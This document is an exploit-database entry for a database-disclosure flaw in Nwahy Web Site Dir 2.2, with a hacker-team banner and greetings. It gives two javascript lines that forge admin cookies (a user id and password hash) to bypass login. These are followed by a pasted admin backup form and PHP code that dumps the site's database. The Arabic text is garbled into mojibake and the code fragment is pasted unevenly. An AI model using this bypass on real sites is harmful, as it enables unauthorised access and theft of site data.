Exploit for php platform in category web applications
==================================================
Nwahy Web Site Dir 2.2 Database Disclosure Exploit
==================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ####################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 ####################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
# Vendor: http://www.nwahy.com/
# Date: 2010-07-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : 00213771818860
# Home : www.sec4ever.net
# Dosrk : Пбнб ЗбгжЗЮЪ ЗбЗХПЗС 2.2 ИСгМЙ nwahy.com
########################################################################
# Exploit By indoushka
1- javascript:document.cookie="userid=1;path=/";
2- javascript:document.cookie="pass=hpl%5Dhgadjd21232f297a57a5a743894a0e4a801fc3;path=/";
<form name='vbform2' method='post' action='http://localhost/dir/admincp/backup.php?x=save'>
<table class='xtable' width='100%' id='AutoNumber155'>
<tr>
<td width='100%' align='center' colspan='3' class='xtt'>ÐÐЩ дУОЙ ЗÐКнЗШне гд ЮЗЪПЙ ЗбИнЗдЗК</td>
</tr>
<tr>
<td width="3%" class='xtr' align='center'>#</td>
<td width="80%" class='xtr' align='center'>ЗУг ЗбМПжб</td>
<td width="17%" class='xtr' align='center'>ЪПП ЗбУМбЗК</td>
</tr>
<form name='vbform2' method='post' action='backup.php?x=save'>
<table class='xtable' width='100%' id='AutoNumber155'>
<tr>
<td width='100%' align='center' colspan='3' class='xtt'>ÐÐЩ дУОЙ ЗÐКнЗШне гд ЮЗЪПЙ ЗбИнЗдЗК</td>
</tr>
<tr>
<td width="3%" class='xtr' align='center'>#</td>
<td width="80%" class='xtr' align='center'>ЗУг ЗбМПжб</td>
<td width="17%" class='xtr' align='center'>ЪПП ЗбУМбЗК</td>
</tr>
<?php
$tables = mysql_query("show tables from $dbname");
$num_tables = mysql_num_rows($tables);
if($num_tables == 0)
{
echo "бЗ нжМП МПЗжб Ðн ЮЗЪПЙ ЗбИнЗдЗК ЗбгÐППе";
exit;
}
$i = 0;
while($i < $num_tables)
{
$table = mysql_tablename($tables, $i);
$RowNum = mysql_query("select * from ".$table);
$RowTotal = mysql_num_rows($RowNum);
echo "<tr>
<td class='xtd' align='center'><input ID='" .$table . "1' type='checkbox' name='" .$table . "' value='1' /></td>
<td class='xtd'><LABEL id='" .$table . "' FOR='" .$table . "1'>" .$table . "</LABEL></td>
<td class='xtd' align='center'>$RowTotal</td>
</tr>\r\n";
$i++;
}
echo "<tr>
<td width='100%' colspan='3' class='xtr'><input ID='x1' checked type='checkbox' name='drop' value='1' dir='rtl' /> <LABEL FOR='x1'>ЕЦЗÐЙ ÐРРЗбМПжб ЕРЗ ЯЗд гжМжПЗр Ðн ЗбИПЗнЙ</LABEL></td>
</tr>
<tr>
<td width='100%' colspan='3' class='xtr'><input ID='x2' type='checkbox' name='zipfile' value='1' dir='rtl' /> <LABEL FOR='x2'>ЗбЦЫШ Zipped</LABEL></td>
</tr>
<tr>
<td width='100%' align='center' colspan='3' class='xtr'><input class='addsubmit' type='submit' value=' КдÐнЬЬР' /></td>
</tr>
</table>
</form>";
echo $f;
}
?>
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------
# 0day.today [2018-04-03] #